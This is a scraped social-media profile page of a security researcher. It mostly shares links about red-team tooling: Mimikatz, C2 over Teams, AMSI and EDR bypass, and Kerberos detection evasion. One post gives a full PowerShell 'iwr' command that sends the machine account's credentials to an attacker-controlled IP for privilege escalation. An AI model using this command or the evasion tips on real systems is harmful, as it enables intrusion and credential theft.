Spiros Fraganastasis
@m3g9tr0nTeam @hashcat! Eternal n00b and knowledge seeker! Age is just a number and motivation is the fuel! Whatever you do in your life, do not forget to be humble.
Similar User
@kmkz_security
@harmj0y
@DirectoryRanger
@MDSecLabs
@BRuteLogic
@byt3bl33d3r
@pentest_swissky
@SpecterOps
@_xpn_
@netbiosX
@PyroTek3
@_RastaMouse
@cobbr_io
@tifkin_
@enigma0x3
After working for sometime on it, I am happy to announce my contribution to The Hacker Recipes project of a Mimikatz documentation tools.thehacker.recipes/mimikatz/modul….
I’ve always thought Seatbelt was a great situational awareness tool, I created a python implementation of it. Due to the nature of how I expect it to run, it only implements the remote modules, but I hope someone finds it useful. github.com/0xthirteen/Car…
''Local Administrator Protection | Privilege Protection'' #infosec #pentest #redteam #blueteam call4cloud.nl/local-administ…
Bypass GuardDuty Pentest Findings for the AWS CLI hackingthe.cloud/aws/avoiding-d…
''GitHub - cxnturi0n/convoC2: C2 infrastructure that allows Red Teamers to execute system commands on compromised hosts through Microsoft Teams.'' #infosec #pentest #redteam #blueteam github.com/cxnturi0n/conv…
BTW, the reason we are releasing a new version of ShellcodePack that soon is that since a few weeks Defender has launched a crackdown on most AMSI bypass methods available in opensource tools. Including Donut, Sliver, etc. We are thus releasing our own custom method that is not…
New ShellcodePack version coming out soon with: - Custom AMSI bypass to weaponize .NET assemblies - Obfuscated Python Shellcode launchers - File timestamp spoofing - Updated EDR bypass profiles #redteam
🍯Introducing Respotter Respotter is a Responder honeypot! It helps you catch attackers and red teams as soon as they spin up Responder in your environment. github.com/lawndoc/Respot…
This project is best effort and community driven. All suggestions and commits to improve it are welcomed and encouraged. github.com/cbecks2/edr-ar…
If you encounter the default IIS Windows window, do not forget to add /haproxy and /netdata to your wordlist and scan them, if you gain unauthorized access here, you will earn a reward 🌹🥰 #bugbountytips #BugBounty Great find by @ynsmroztas
An interesting issue I researched recently that hasn't really been mentioned before. KVM-over-IP devices, and how they can potentially impact an enterprise environment and lead to compromise. Take a look: blog.grumpygoose.io/hold-me-closer…
There are some interesting detections for U2U/UnPAC the hash in certipy/rubues/mimiktaz/impacket based on TGS ticket options (medium.com/falconforce/fa…). Did some tinkering and by removing a few flags you can shake detection while still recovering the NT hash from a TGT
Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess logan-goins.com/2024-05-04-ADC…
I just released a blogpost where I describe how two open source tools can be easily converted to Reflective DLL to be loaded in memory with Cobalt Strike. sokarepo.github.io/redteam/2023/1… This post comes along with github.com/sokaRepo/Coerc… which exists thanks to @Prepouce_ work
I just released a series of 2 blog posts about increasing your stealth capabilities during offensive operations. I hope you will find something useful! sokarepo.github.io/redteam/2024/0…
"A (partial) Python rewriting of PowerSploit's PowerView" for @DefconParis github.com/ThePirateWhoSm…
@Ze_Asimovitch and I have just released a new blog post on "How to create your own Mythic Agent en C" red-team-sncf.github.io/how-to-create-…
Monitor CobaltStrike beacon for Windows tokens and gain Kerberos persistence - @pentest_soka sokarepo.github.io/redteam/2024/0…
Hunting for user tokens with CS Beacon, by @pentest_soka #redteam #maldev sokarepo.github.io/redteam/2024/0…
👀The godap project from @MacmodSec is 🤌! "A complete TUI for LDAP." github.com/Macmod/godap
A few months ago I've created a "Pefect DLL Loader". You can find some details on my article that was just published today ! The full implem can be found directly in the @defcon workshop in my github ! Hope you will learn something in this 😊 riskinsight-wavestone.com/en/2024/10/loa…
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
United States Trends
- 1. Mike 1,82 Mn posts
- 2. Serrano 237 B posts
- 3. #NetflixFight 70,9 B posts
- 4. Canelo 16,1 B posts
- 5. #netflixcrash 15,5 B posts
- 6. Father Time 10,8 B posts
- 7. Logan 77,8 B posts
- 8. Rosie Perez 14,7 B posts
- 9. He's 58 24,3 B posts
- 10. Boxing 291 B posts
- 11. ROBBED 101 B posts
- 12. #buffering 10,8 B posts
- 13. Shaq 15,9 B posts
- 14. My Netflix 82,4 B posts
- 15. Tori Kelly 5.154 posts
- 16. Roy Jones 7.117 posts
- 17. Ramos 70,3 B posts
- 18. Cedric 21,7 B posts
- 19. Gronk 6.566 posts
- 20. Barrios 50,5 B posts
Who to follow
-
kmkz
@kmkz_security -
Will Schroeder
@harmj0y -
DirectoryRanger
@DirectoryRanger -
MDSec
@MDSecLabs -
Brute Logic
@BRuteLogic -
Marcello
@byt3bl33d3r -
Swissky
@pentest_swissky -
SpecterOps
@SpecterOps -
Adam Chester 🏴☠️
@_xpn_ -
Panos Gkatziroulis 🦄
@netbiosX -
Sean Metcalf
@PyroTek3 -
Rasta Mouse
@_RastaMouse -
Ryan Cobb
@cobbr_io -
Lee Chagolla-Christensen
@tifkin_ -
Matt Nelson
@enigma0x3
Something went wrong.
Something went wrong.